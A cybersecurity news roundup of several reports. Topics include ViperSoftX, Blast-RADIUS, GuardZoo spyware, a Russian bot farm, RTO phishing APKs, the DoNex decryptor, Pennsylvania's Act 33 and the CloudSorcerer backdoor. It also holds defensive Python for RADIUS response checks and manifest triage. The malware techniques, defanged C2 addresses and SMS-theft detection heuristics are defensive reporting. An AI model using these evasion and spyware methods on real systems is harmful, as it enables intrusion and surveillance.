The malware's use of CLR to run PowerShell within AutoIt is particularly sneaky. AutoIt, typically used for automating Windows tasks, is often trusted by security software; by piggybacking on this trust, ViperSoftX can fly under the radar. The malware has additional tricks up its sleeve in the form of heavy obfuscation, deception and encryption to hide its true nature. ViperSoftX uses heavy Base64 obfuscation and AES encryption to hide the commands in the PowerShell scripts extracted from the image decoy files. This level of obfuscation challenges both researchers and analysis tools, making it even more difficult to decipher the malware's functionality and intent. The malware even attempts to modify the Antimalware Scan Interface (AMSI) to bypass security checks run against its scripts. By leveraging existing scripts, the malware developers accelerate development and focus on improving their evasion tactics. Analysis of the malware's network activity shows attempts to blend its traffic with legitimate system activity. Researchers observed the malware using deceptive hostnames such as security-microsoft[.]com to appear more trustworthy and to deceive victims into associating the traffic with Microsoft. Analysis of a suspicious Base64-encoded User-Agent string revealed a detailed set of system information extracted from infected systems through PowerShell command execution, including the logical disk volume serial number, computer name, username, operating system version, antivirus product information, and cryptocurrency details. The researchers warn of the increasing sophistication of ViperSoftX's operations, as its ability to execute malicious functions while evading traditional security measures makes it a formidable opponent.

Blast-RADIUS Vulnerability Affects Widely-Used RADIUS Authentication Protocol

By: Alan J
10 July 2024 at 16:49

Blast-RADIUS Attack RADIUS Authentication Protocol

A critical vulnerability in the widely used RADIUS authentication protocol could allow attackers to gain unauthorized access to networks and devices, researchers have discovered. The flaw, dubbed "Blast-RADIUS," affects a protocol that has functioned as a cornerstone of modern network infrastructure. RADIUS, which stands for Remote Authentication Dial-In User Service, is used by nearly every switch, router, access point and VPN concentrator sold in the last 20 years. It verifies user credentials for remote access to networked devices, including network routers and switches, industrial control systems, VPNs, ISPs using DSL or FTTH, 2G and 3G cellular roaming, and 5G DNN authentication.

The Blast-RADIUS Attack

Researchers from several universities, along with some private firms, discovered that a man-in-the-middle attacker could exploit a weakness in how the RADIUS protocol authenticates server responses. By injecting malicious data into a legitimate authentication request, an attacker can forge a valid "Access-Accept" message in response to a failed login attempt. (Figure: Blast-RADIUS protocol flow. Source: blastradius.fail) This allows the attacker to turn a reject into an accept and assign themselves arbitrary network privileges. The attack abuses the MD5 hash function, which has long been known to be vulnerable to chosen-prefix collisions. The attacker can use such a collision to craft a modified packet whose Response Authenticator matches the authentic one generated by the server, without any knowledge of the shared secret between the client and server. (Figure: Blast-RADIUS vulnerability. Source: blastradius.fail) While MD5 hash collisions have been known since 2004, the researchers state that their attack technique is much more complex than older forms of MD5 collision attacks. Further, MD5 collisions were not previously thought of as a possible way to exploit the RADIUS protocol. The new attack must be carried out online, with the attacker having to compute the chosen-prefix MD5 collision in a matter of minutes or even seconds. The researchers state that the best previously reported chosen-prefix collision attack typically took hours to produce collisions, and those collisions were not compatible with the RADIUS protocol. The Blast-RADIUS technique incorporates several improvements in speed, space, and scaling over existing MD5 attacks, demonstrating that collisions can be produced in intervals short enough to compromise the popular RADIUS protocol.
While the proof-of-concept attacks described in the paper took about 3 to 6 minutes for the MD5 chosen-prefix hash collision computation, longer than the 30- to 60-second timeouts commonly used in practice for RADIUS, each step of the new collision algorithm parallelizes well and allows for further hardware optimization. The researchers expect that a well-resourced attacker could obtain computation times tens or hundreds of times faster by running the attack on better GPUs, FPGAs, or other optimized hardware. The Blast-RADIUS attack affects all known RADIUS implementations that use non-EAP authentication methods over UDP, including the common FreeRADIUS implementation. The researchers disclosed details of the vulnerability to the IETF (Internet Engineering Task Force) and CERT (Computer Emergency Readiness Team) and expect major implementations of the RADIUS protocol to release patches that mitigate the attack based on the Message-Authenticator specifications.

RADIUS Mitigation and Future Outlook

The IETF RADEXT working group is said to be pushing for the standardization of a more secure version of the RADIUS protocol, which the researchers state would help mitigate the Blast-RADIUS vulnerability. While the researchers note that major RADIUS implementations are working on releasing patches to mitigate the vulnerability, they say the attack demonstrates the need to scrap the aging protocol and move away from it entirely. In the meantime, the researchers urge system administrators to check with vendors for patches against the vulnerability and to follow best practices for secure RADIUS configuration. The Blast-RADIUS attack serves as a reminder that even long-standing protocols can harbor critical flaws. The research demonstrates that as network deployments grow more complex, there must be continued scrutiny of these technologies to maintain security.
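As an added example (not the researchers' code, and not a collision demonstration), the following Python shows the two checks a RADIUS client can apply to an Access-Accept: the MD5 Response Authenticator that Blast-RADIUS targets, and the HMAC-MD5 Message-Authenticator attribute (RFC 2869, attribute type 80) that the expected patches lean on. The shared secret and Request Authenticator are constructed values; the packet layout follows RFC 2865.

```python
import hashlib
import hmac
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME = 1
ATTR_MESSAGE_AUTHENTICATOR = 80   # RFC 2869 section 5.14: 16-byte HMAC-MD5
HEADER_LEN = 20                   # code(1) id(1) length(2) authenticator(16)


def encode_attrs(attrs):
    """Serialize [(type, value), ...] as RADIUS TLVs (length covers type+len bytes)."""
    out = bytearray()
    for atype, value in attrs:
        out += bytes([atype, 2 + len(value)]) + value
    return bytes(out)


def decode_attrs(blob):
    attrs, i = [], 0
    while i < len(blob):
        if i + 1 >= len(blob):
            raise ValueError("truncated attribute")
        atype, alen = blob[i], blob[i + 1]
        if alen < 2 or i + alen > len(blob):
            raise ValueError("malformed attribute")
        attrs.append((atype, blob[i + 2:i + alen]))
        i += alen
    return attrs


def _header(code, ident, length, authenticator):
    return struct.pack("!BBH", code, ident, length) + authenticator


def response_authenticator(code, ident, request_auth, attrs_blob, secret):
    """RFC 2865: MD5(Code + ID + Length + RequestAuth + Attributes + Secret).
    This is the value Blast-RADIUS matches with an MD5 chosen-prefix collision."""
    length = HEADER_LEN + len(attrs_blob)
    return hashlib.md5(_header(code, ident, length, request_auth) + attrs_blob + secret).digest()


def message_authenticator(code, ident, request_auth, attrs_blob, secret):
    """HMAC-MD5 over the packet with the authenticator field holding the Request
    Authenticator and the Message-Authenticator value zeroed (RFC 2869)."""
    length = HEADER_LEN + len(attrs_blob)
    return hmac.new(secret, _header(code, ident, length, request_auth) + attrs_blob,
                    hashlib.md5).digest()


def build_response(code, ident, request_auth, attrs, secret, with_ma=True):
    """Server side: add Message-Authenticator (optional), then seal with the MD5 authenticator."""
    attrs = list(attrs)
    if with_ma:
        attrs.append((ATTR_MESSAGE_AUTHENTICATOR, bytes(16)))
        mac = message_authenticator(code, ident, request_auth, encode_attrs(attrs), secret)
        attrs[-1] = (ATTR_MESSAGE_AUTHENTICATOR, mac)
    blob = encode_attrs(attrs)
    resp_auth = response_authenticator(code, ident, request_auth, blob, secret)
    return _header(code, ident, HEADER_LEN + len(blob), resp_auth) + blob


def verify_response(packet, request_auth, secret, require_ma=True):
    """Client side; returns (accepted, reason). With require_ma=True a response lacking a
    valid Message-Authenticator is rejected even when its MD5 authenticator matches, which
    is what closes the Blast-RADIUS forgery path (an HMAC cannot be collided without the secret)."""
    if len(packet) < HEADER_LEN:
        return False, "truncated packet"
    code, ident, length = struct.unpack("!BBH", packet[:4])
    if length != len(packet):
        return False, "length mismatch"
    auth, blob = packet[4:HEADER_LEN], packet[HEADER_LEN:]
    if not hmac.compare_digest(auth, response_authenticator(code, ident, request_auth, blob, secret)):
        return False, "bad Response Authenticator"
    try:
        attrs = decode_attrs(blob)
    except ValueError:
        return False, "malformed attributes"
    mas = [v for t, v in attrs if t == ATTR_MESSAGE_AUTHENTICATOR]
    if not mas:
        if require_ma:
            return False, "Message-Authenticator missing"
        return True, "accepted on MD5 authenticator only"
    zeroed = encode_attrs([(t, bytes(16) if t == ATTR_MESSAGE_AUTHENTICATOR else v)
                           for t, v in attrs])
    expected = message_authenticator(code, ident, request_auth, zeroed, secret)
    if len(mas[0]) != 16 or not hmac.compare_digest(mas[0], expected):
        return False, "bad Message-Authenticator"
    return True, "ok"


# Constructed demo values: not a real deployment's secret or authenticator.
SECRET = b"constructed-shared-secret"
REQUEST_AUTH = bytes(range(16))

if __name__ == "__main__":
    good = build_response(ACCESS_ACCEPT, 7, REQUEST_AUTH, [(ATTR_USER_NAME, b"alice")], SECRET)
    print("genuine accept:", verify_response(good, REQUEST_AUTH, SECRET))
    # A reject rewritten into an accept on the wire fails the MD5 check without a collision;
    # with one it would pass that check, but never the HMAC check below.
    forged = bytes([ACCESS_ACCEPT]) + build_response(ACCESS_REJECT, 7, REQUEST_AUTH, [], SECRET)[1:]
    print("rewritten reject:", verify_response(forged, REQUEST_AUTH, SECRET))
    legacy = build_response(ACCESS_ACCEPT, 7, REQUEST_AUTH, [], SECRET, with_ma=False)
    print("no MA, lenient client:", verify_response(legacy, REQUEST_AUTH, SECRET, require_ma=False))
    print("no MA, strict client:", verify_response(legacy, REQUEST_AUTH, SECRET, require_ma=True))
```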

Houthi-Deployed Android Surveillance Tool 'GuardZoo' Targeted Middle Eastern Militaries

By: Alan J
10 July 2024 at 14:04

GuardZoo houthi

Cybersecurity researchers observed an Android surveillance campaign active since October 2019 that has targeted the military personnel of various countries in the Middle East. The researchers believe the operation has ties to a Houthi-aligned threat actor. Referred to as "GuardZoo," the spyware has infected devices belonging to more than 450 victims. The campaign remains active with researchers still analyzing related activity.

GuardZoo Infection of Middle Eastern Military Targets

GuardZoo is based on Dendroid RAT, an underground RAT sold for $300 that also included a binding utility to infect legitimate programs, and which was leaked online in 2014. Researchers noted many modifications to the original source code to implement additional capabilities while removing some unused functions. The GuardZoo malware uses a new C2 backend created with ASP.NET instead of relying on the native Dendroid RAT PHP web panel for remote Command and Control (C2). The researchers from Lookout attribute the campaign to a Yemeni, Houthi-aligned threat actor based on the application lures, exfiltrated data, targeting, and the C2 infrastructure location. The campaign has been observed to primarily target victims in Yemen, Saudi Arabia, Egypt, Oman, the UAE, Qatar, and Turkey. (Figure: Houthi surveillanceware targeting Middle Eastern militaries. Source: www.lookout.com) (Figure: GuardZoo overview. Source: www.lookout.com) The researchers observed the use of two C2 addresses, the first of which functioned as the primary address (https://wwwgoogl.zapto[.]org) and the second as a backup (https://somrasdc.ddns[.]net). The malware can receive over 60 different commands from these C2 servers, most of which are implementations exclusive to GuardZoo. The researchers compiled a list of some of the most notable C2 commands and their respective functions: (Figure: Notable GuardZoo C2 commands. Source: www.lookout.com) GuardZoo can collect a wide range of data from infected devices, including photos, documents, location data, saved GPS routes and tracks, device model number, mobile carrier, and Wi-Fi configuration.
Moreover, it can enable the actor to deploy additional invasive malware on the infected device. The device's location, model, and cellular service carrier can also be collected. The surveillanceware is distributed via WhatsApp, WhatsApp Business, and direct browser download, and uses military themes to lure victims. Lookout researchers have observed recent samples of GuardZoo posing as religious, e-book, and military-themed apps, such as 'The Holy Quran,' 'Constitution of the Armed Forces,' 'Limited - Commander and Staff,' and 'Restructuring of the New Armed Forces.' (Figure: GuardZoo lure apps. Source: www.lookout.com)

Researchers Trace Houthi Connection

Researchers found evidence linking GuardZoo to Yemen's Houthi militia, which the U.S. government recently redesignated as a global terrorist group. Analysis of server logs revealed that many of the identified victims appeared to be members of the pro-Hadi forces in Yemen. Additionally, the malware's C2 servers were found to be hosted on YemenNet infrastructure, belonging to an ISP that is owned by the Yemeni state. Researchers noted that some of the log entries indicated that the devices belonged to forces aligned with President Hadi's government, which operates from Aden. One of the exfiltrated documents contained phrases that translated to "Very Confidential, Republic of Yemen, Ministry of Defense, Chief of the General Staff, War Operations Department, Insurance division."

Protection Against GuardZoo

Aaron Cockerill, Executive Vice President of Product & Security at the security firm, stated, "These spyware packages can be used to collect a wide range of data from infected devices, which in the case of GuardZoo, could put military personnel and operations at risk. We urge security professionals to be aware of this threat and to take steps to protect their users, and work and personal data." To protect both business and personal Android devices from GuardZoo and other surveillanceware, the researchers have recommended the following basic steps:
  • Keep your operating system and apps up to date, as most updates nowadays are related to security patches.
  • Only install apps from Google Play, not third-party sources. If you receive a message asking you to install an app from a website, immediately block the number and report the incident to your IT or Security team.
  • Be mindful of the permissions that mobile apps ask for. Overly invasive permissions, even from legitimate apps, could create data risk for your organization.
  • Implement a mobile security solution that can detect and protect against malware and keep your organization safe.

FBI Releases Joint Advisory on Russian AI Tool Used to Sow Disinformation On Social Media

By: Alan J
9 July 2024 at 18:23

Meliorator Bot FBI

The U.S. Federal Bureau of Investigation (FBI), along with the domestic Cyber National Mission Force and several international intelligence agencies, has uncovered a sophisticated Russian-backed operation that used an artificial intelligence-powered bot farm to spread disinformation on social media platforms. The agencies, which included international partners such as the Netherlands General Intelligence and Security Service and the Canadian Centre for Cyber Security, have released a joint advisory to warn social media companies about Russian state-sponsored actors employing the Meliorator software for malign influence activity in foreign nations and the United States. While currently focused on X (formerly Twitter), analysts believe the tool's developers intend to expand to other platforms.

Meliorator Bot Farm Characteristics and Capabilities

(Figure: Agencies involved in the investigation of the Russian operation. Source: www.ic3.gov) The Meliorator tool creates bot persona 'souls' (false identities) with varying levels of information on their profiles and relevant 'thoughts' (automated actions). The first bot archetype has complete profiles, including a profile photo, cover photo, and biographical data, while the second archetype has very little information. The third archetype appears real by generating a lot of activity and garnering followers. (Figure: Meliorator bot network. Source: www.ic3.gov) The bot personas are capable of deploying content similar to that of typical social media users, mirroring disinformation from existing bot personas, perpetuating specified pre-existing false narratives, and formulating messaging based on the specific archetype of the bot. To avoid detection, the creators of the Meliorator tool used various obfuscation techniques, including IP address obfuscation, bypass of dual factor authentication, and modification of browser user agent strings to appear more consistent. The bot personas also follow genuine accounts reflective of the political leanings and interests listed in their biographies, making them appear more authentic to viewers. The tool has been used by FSB services since 2022 to generate mass quantities of social media profiles that appear to be authentic. The software includes an administrator panel called "Brigadir" and a seeding tool named "Taras," which contains backend files to control the personas used to spread disinformation. These "souls" are stored in a MongoDB database for easy manipulation. Operators access Meliorator through virtual network computing hosted at dtxt.mlrtr[.]com, using project management software from Redmine.

Justice Department Seizes Associated Domains

In relation to the joint action by intelligence agencies, the U.S. Justice Department announced the seizure of two related domain names and 968 social media accounts used in malign influence operations. According to the press release, the bot farm was developed by an individual identified as Individual A, who worked as the deputy editor-in-chief at RT, a state-run Russian news organization. In early 2022, when RT leadership sought to develop alternative means for distributing information beyond traditional news broadcasts, Individual A led the development of software to create and operate a social media bot farm, with the capability of creating fictitious online personas on a wide-scale basis to advance the mission of the FSB and the Russian government. The bot farm's operators used the network to spread disinformation on various topics, including the Russia-Ukraine conflict. These included videos in which President Putin justified Russia's actions in Ukraine, and claims that certain areas of Poland, Ukraine, and Lithuania were "gifts" to those countries from the Russian forces that liberated them from Nazi control during World War II. (Figure: Meliorator bot. Source: justice.gov) (Figure. Source: justice.gov) The bot farm was also used to spread videos claiming that the number of foreign fighters fighting for the Ukrainian forces was significantly lower than public estimates. Deputy Attorney General Lisa Monaco stated, "Today's action demonstrates that the Justice Department and our partners will not tolerate Russian government actors and their agents deploying AI to sow disinformation and fuel division among Americans." "As malign actors accelerate their criminal misuse of AI, the Justice Department will respond and we will prioritize disruptive actions with our international partners and the private sector. We will not hesitate to shut down bot farms, seize illegally obtained internet domains, and take the fight to our adversaries," she added. The FSB's use of U.S.-based domain names, which the software used to register the bots, violates the International Emergency Economic Powers Act. In addition, the accompanying payments for that infrastructure violate federal money laundering laws. X (formerly Twitter) took action to voluntarily suspend bot accounts identified in the investigation for violation of its terms of service. The FBI worked with cybersecurity agencies from Canada, the Netherlands and other partners to analyze the bot farm's technology. The Justice Department has released a joint cybersecurity advisory on the research findings of the intelligence agencies, allowing social media platforms and researchers to identify and prevent further use of the technology. (Figure. Source: www.ic3.gov) The publication includes IP addresses, SSL certificates, mail server domains, and related details associated with the infrastructure of the Meliorator bot network.

WhatsApp Android Users in India Targeted by Regional Transport Office Phishing Scam

By: Alan J
9 July 2024 at 12:10

Regional Transport Office (RTO) Phishing Scam

Cyble Research and Intelligence Labs (CRIL) researchers have observed a new campaign in which threat actors claiming to be from India's Regional Transport Office (RTO) have targeted Indian WhatsApp users in phishing operations. The campaign marks a shift from earlier tactics, such as the use of WhatsApp instead of SMS for delivering phishing messages, and a change in focus from banking customers to the impersonation of government agencies and utility companies.

Regional Transport Office (RTO) WhatsApp Phishing Scam

The researchers said that since the beginning of 2024, Indian citizens have been observed receiving phishing messages on WhatsApp that impersonate the Regional Transport Office (RTO), also commonly referred to as Vahan Parivahan, a governmental organization in India responsible for vehicle registration, driver licensing, and other transport-related matters. (Figure: Regional Transport Office (RTO) malware. Source: cyble.com/blog) Targets have received various WhatsApp messages claiming that their vehicle was found to be in violation of traffic rules, with a download link to an app titled "VAHAN PARIVAHAN," supposedly intended for viewing official citations or a "challan" (a government-recognized document or receipt). These phishing messages abused legitimate regional RTO logos as WhatsApp profile pictures to lend further cover and to lure potential victims into downloading the attached malicious .APK file. Once installed, the app requests permissions to access SMS messages and contacts. It runs in the background, collecting device information and sending it to the attackers through a Telegram bot. The malware then starts a service that connects to a Firebase URL to retrieve additional lists of phone numbers and text messages. This service is used to send SMS messages from infected devices to the phone numbers listed on the Firebase server. The researchers from Cyble had earlier noticed a remarkably similar campaign used to target the customers of major Indian banks through malicious bank-related applications purporting to represent those banks, even bearing similar names, icons and user interfaces to the official banking apps. The malware in the earlier campaign was used to collect banking credentials, credit card details, personally identifiable information (PII) and email credentials from victims.

Researchers Observe Advancements in Malware Campaigns

The researchers noted that threat actors have been observed deploying advanced malware strains that do not rely on launcher activities. Examination of the manifest file from the recent campaign reveals the absence of a launcher activity, which prevents an app icon from appearing in the app drawer of infected devices and makes it harder for victims to identify and uninstall the malware. The RTO scam reflects broader changes among such campaigns, marked by:
  • Shift from SMS to WhatsApp for distribution of phishing messages.
  • Focus beyond banking targets to impersonation of legitimate utility bills and government schemes/authorities.
  • Use of Malware-as-a-Service (MaaS) in campaigns.
  • Additional stealthy tactics such as leaving out launcher activities to evade detection.
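The two manifest-level traits described above (SMS and contacts permissions, no launcher activity) can be checked mechanically during triage. The script below is an added example, not Cyble's code; it assumes the APK's AndroidManifest.xml has already been decoded to plain XML (for instance with apktool), and both manifests embedded in it are constructed for illustration.

```python
"""Triage heuristic for decoded Android manifests: flag apps that request
SMS/contacts permissions but declare no MAIN/LAUNCHER activity (so no icon
appears in the app drawer). Both sample manifests are CONSTRUCTED; the
manifest is assumed to be already decoded to plain XML (e.g. by apktool).
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Permissions that let an app read or intercept SMS and harvest contacts.
SENSITIVE_PERMISSIONS = {
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.SEND_SMS",
    "android.permission.READ_CONTACTS",
}


def _attr(elem, name):
    """Read an android:NAME attribute from a manifest element."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def has_launcher_activity(root):
    """True if any activity or activity-alias carries a MAIN + LAUNCHER intent filter."""
    for elem in root.iter():
        if elem.tag not in ("activity", "activity-alias"):
            continue
        for intent_filter in elem.findall("intent-filter"):
            actions = {_attr(a, "name") for a in intent_filter.findall("action")}
            categories = {_attr(c, "name") for c in intent_filter.findall("category")}
            if ("android.intent.action.MAIN" in actions
                    and "android.intent.category.LAUNCHER" in categories):
                return True
    return False


def requested_permissions(root):
    """Set of permission names declared with <uses-permission>."""
    return {_attr(p, "name") for p in root.findall("uses-permission")}


def triage_manifest(manifest_xml):
    """Return findings for one decoded manifest as a dict."""
    root = ET.fromstring(manifest_xml)
    sensitive = sorted(requested_permissions(root) & SENSITIVE_PERMISSIONS)
    launcher = has_launcher_activity(root)
    # A hidden app (no launcher icon) that can read SMS/contacts is the
    # high-suspicion combination; either trait alone is common in benign apps.
    return {
        "package": root.get("package"),
        "has_launcher_activity": launcher,
        "sensitive_permissions": sensitive,
        "suspicious": (not launcher) and bool(sensitive),
    }


# Constructed: SMS/contacts permissions, a background service and an SMS
# receiver, but no MAIN/LAUNCHER activity.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed.vahan">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <application android:label="VAHAN PARIVAHAN">
        <activity android:name=".PermissionPrompt" android:exported="true"/>
        <service android:name=".SyncService" android:exported="false"/>
        <receiver android:name=".SmsReceiver" android:exported="true">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# Constructed: an ordinary app with a launcher activity and no sensitive permissions.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed.notes">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Notes">
        <activity android:name=".MainActivity" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
"""

if __name__ == "__main__":
    for manifest in (SAMPLE_MANIFEST, BENIGN_MANIFEST):
        print(triage_manifest(manifest))
```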
Along with sharing of potential Indicators of Compromise (IOCs) and classifying the campaign under MITRE categories, the researchers have listed some recommendations to protect against the campaign:
  • Download software only from legitimate official sources such as the Google Play Store or the iOS App Store.
  • Use capable antivirus and internet security tools to scan downloaded software packages on all internet-connected devices (PCs, laptops and mobile devices).
  • Use strong passwords and multi-factor authentication wherever possible.
  • Use biometric security features such as fingerprint or facial recognition to secure devices.
  • Maintain vigilance regarding links received via SMS messages or emails.
  • Enable Google Play Protect on Android devices.
  • Be careful with permissions granted to downloaded apps.
  • Regularly update devices, operating systems, and applications.
The researchers also noted the possibility that received digital payment (Unified Payments Interface, UPI) verification messages could be stealthily forwarded to attacker-operated devices to compromise payment systems, as observed in other attacks.
[Figure: Simpl UPI Regional Transport Office. Source: cyble.com/blog]

Researchers Crack DoNex Ransomware Encryption with Flaw in Cryptographic Schema

By: Alan J
8 July 2024 at 21:40

Crack DoNex Ransomware Encryption

Researchers have discovered a critical flaw in the cryptographic schema of the DoNex ransomware and all of its variants and predecessors. Working with law enforcement agencies, they have been discreetly providing a decryptor to affected DoNex victims since March 2024. The cryptographic vulnerability was publicly discussed at Recon 2024, prompting the researchers to officially disclose details of the flaw and its implications.

DoNex Ransomware Operations

Avast researchers noted that the DoNex ransomware has undergone several rebrandings after initially identifying as Muse in April 2022. Subsequent iterations included a rebrand to a purported Fake LockBit 3.0 in November 2022, then to DarkRace in May 2023, and finally to DoNex in March 2024. Since April 2024, the researchers noted, no newer samples have been detected and the ransomware group's official TOR address has remained inactive, suggesting that DoNex may have ceased its evolution and rebranding attempts.
DoNex ransomware employs a complex encryption process. During execution, an encryption key is generated using the CryptGenRandom function. This key initializes a ChaCha20 symmetric key, which is then used to encrypt files. After encryption, the symmetric key is encrypted with RSA-4096 and appended to the affected file. Files up to 1 MB are encrypted in full, while larger files are encrypted in segments of blocks. The ransomware's configuration, including whitelisted extensions, files and services to terminate, is stored in an XOR-encrypted configuration file.
While the researchers have not detailed the exact process they used to break the encryption, more details on the same cryptographic vulnerability are available from the materials for the Recon 2024 talk titled "Cryptography is hard: Breaking the DoNex ransomware," presented by Gijs Rijnders, a malware reverse engineer and cyber threat intelligence analyst working for the Dutch National Police.
[Figure: DoNex decryptor used by the Dutch National Police, different from the Avast version. Source: cfp.recon.cx]
DoNex primarily targeted victims in the US, Italy and Belgium, using focused attacks. The researchers confirmed that all variants of the DoNex ransomware, along with its earlier versions, can be decrypted using the released DoNex decryptor.

[Figure: DoNex ransomware map (Avast). Source: decoded.avast.io]

Identifying DoNex Ransomware and Decryption

Victims of the DoNex ransomware can recognize an attack through the ransom note left by the malware. Although the different variants (Fake LockBit, DarkRace and DoNex) produce distinct ransom notes, they share a similar layout.
[Figure: Avast version of the DoNex decryptor. Source: decoded.avast.io]
The researchers have shared instructions for using their decryptor on files encrypted by DoNex ransomware:
  1. Download the provided decryptor. (The researchers recommend running the 64-bit version of the program because of its memory requirements.)
  2. Run the decryptor's executable file as an administrator. The program runs as a wizard, automatically guiding you through the decryption process.
  3. While the program lists all local drives by default, the user is asked to provide a list of locations to be decrypted.
  4. Users are then asked to provide an encrypted file (from any variant of DoNex) as well as a copy of the original file from before encryption. The researchers emphasize selecting the largest possible pair of files for this step.
  5. The next step of the wizard begins the password cracking process. The researchers state that while the cracking itself takes only a second, it requires a large amount of memory. Once this step completes, users can proceed to decrypt all the files on their system.
  6. In the final step, users can opt to back up encrypted files, which may help in the event of a failure during decryption. The researchers stated that this option is enabled by default.
  7. Users can then let the program run as it attempts to decrypt all the DoNex-encrypted files on their system.
The researchers have also shared indicators of compromise (IOCs) for the Fake LockBit 3.0, DarkRace and DoNex variants of the ransomware.

New 'Act 33' Pennsylvania Law Mandates Stricter Protection for Victims of Data Breaches

By: Alan J
8 July 2024 at 17:01

'Act 33' Pennsylvania Law data breach

A recently passed Pennsylvania law aims to bolster consumer protections in the aftermath of data breaches. Act 33 of 2024, which is set to take effect in late September of this year, mandates stricter time limits for organizations to issue data breach notices and free provision of credit monitoring to affected individuals in the event of a data breach.

Key Provisions of Act 33 Pennsylvania Law

Under the provisions of the new law, organizations must notify the Pennsylvania Attorney General's Office if a data breach is found to affect more than 500 residents of Pennsylvania.
[Figure: Act 33 Pennsylvania Law Data Breach. Source: www.legis.state.pa.us]
The notice is required to include the following details:
  1. The organization name and location.
  2. The date of the breach of the security of the system.
  3. A summary of the breach incident of the security of the system.
  4. An estimated total number of individuals affected by the breach of the security of the system.
  5. An estimated total number of individuals in this Commonwealth affected by the breach of the security of the system.
Along with the reporting requirements, one of the key provisions of the law is the requirement for organizations to provide free credit reports and one year of credit monitoring to all affected consumers. The law introduces a new era of protection for consumers, requiring organizations to assume all costs and fees associated with providing affected individuals with access to credit reports and credit monitoring services. This provision means that individuals from Pennsylvania will not have to pay for these services, which can provide peace of mind in the event of a data breach and add an additional layer of protection to help prevent identity theft and financial fraud. The law defines personal information as an individual's first name or first initial and last name in combination with certain sensitive data elements, such as Social Security numbers, driver's licenses, or financial account numbers. The law is an extension of the amendment act of December 22, 2005 (P.L.474, No.94), which states:
"An act providing for security of computerized data and for the notification of residents whose personal information data was or may have been disclosed due to a breach of the security of the system; and imposing penalties," further providing for definitions, for notification of the breach of the security of the system and for notification of consumer reporting agencies; and providing for credit reporting and monitoring.
The Act 33 law received unanimous support in both chambers of the state legislature, reflecting the broad recognition of the need for stronger data protection measures.

Act Comes Amidst Geisinger Medical Center Data Breach Fallout

Reports of data breach incidents across the United States have surged in recent years, with a record 3,122 incidents reported nationwide in 2023, a 72% increase from the previous high in 2021. According to data from the Identity Theft Resource Center, these breaches affected hundreds of millions of Americans and resulted in billions of dollars in losses. The new law comes in the wake of high-profile breaches like the one at Pennsylvania's Geisinger Medical Center, which potentially exposed the personal information of approximately one million patients. A former employee has been arrested in connection with the data breach. Jonathan Friesen, Geisinger chief privacy officer, stated in response to the arrest, "Our patients' and members' privacy is a top priority, and we take protecting it very seriously." He added, "We continue to work closely with the authorities on this investigation, and while I am grateful that the perpetrator was caught and is now facing federal charges, I am sorry that this happened." Disgruntled former patients of the hospital have joined a class action lawsuit filed against Geisinger, demanding compensation. One former patient, James Wierbowski, filed a lawsuit on June 28 seeking monetary relief that could amount to more than $5 million.

CloudSorcerer APT Targets Russian Government for Stealthy Espionage

By: Alan J
8 July 2024 at 14:22

CloudSorcerer Russian Government malware

Security researchers discovered a new sophisticated cyberespionage tool targeting Russian government entities in May 2024. The tool, dubbed CloudSorcerer, exploits popular cloud infrastructure services such as Microsoft Graph, Yandex Cloud and Dropbox for use as command and control (C2) servers for stealth monitoring, data collection and exfiltration operations.

Technical Details of CloudSorcerer Campaign

Researchers from Kaspersky believe that a new APT group is behind the CloudSorcerer malware. The malware is a single Portable Executable (PE) binary written in C that adjusts its functionality depending on the process from which it is executed. Upon execution, the malware calls the GetModuleFileNameA function to determine the name of the process it is running in, then compares that name against a set of hardcoded strings identifying browsers, mspaint.exe and msiexec.exe. The malware activates different functions depending on the identified process name:
  • In mspaint.exe: Acts as a backdoor within the program to collect data and execute code.
  • In msiexec.exe: Initiates C2 communication.
  • In browser or other detected processes: Injects shellcode into targeted processes before terminating.
The malware's backdoor module begins by collecting system information about the victim machine in a separate thread. This information includes the computer name, user name, Windows subversion information and system uptime. All the collected data is stored in a specially created structure. Once information gathering is complete, the data is written to the named pipe \.\PIPE[1428], which connects to the C2 module process. The backdoor then executes various commands based on received instructions, such as gathering drive information, collecting file and folder data, executing shell commands, manipulating files, injecting shellcode into processes and running advanced tasks like creating processes, modifying registry keys and managing network users. Each operation is specified by a unique COMMAND_ID within the malware:
[Figure: CloudSorcerer Campaign Russian Government. Source: securelist.com (Kaspersky)]
  • 0x1 – Collect information about hard drives in the system, including logical drive names, capacity, and free space.
  • 0x2 – Collect information about files and folders, such as name, size, and type.
  • 0x3 – Execute shell commands using the ShellExecuteExW API.
  • 0x4 – Copy, move, rename, or delete files.
  • 0x5 – Read data from any file.
  • 0x6 – Create and write data to any file.
  • 0x8 – Receive a shellcode from the pipe and inject it into any process by allocating memory and creating a new thread in a remote process.
  • 0x9 – Receive a PE file, create a section and map it into the remote process.
  • 0x7 – Run additional advanced functionality.
The researchers also observed the use of GitHub pages as C2 servers, with the C2 address stealthily hidden as a hex string within the author section of the profile. These profiles contained unmodified forks of public, legitimate code repositories in order to appear legitimate. The same hex string was also observed hidden within the names of public photo albums hosted on the Russian album-sharing service https://my.mail[.]ru. Associated profiles on both services contained a photo of a male from a public photo bank.
[Figure: CloudSorcerer malware. Source: securelist.com (Kaspersky)]
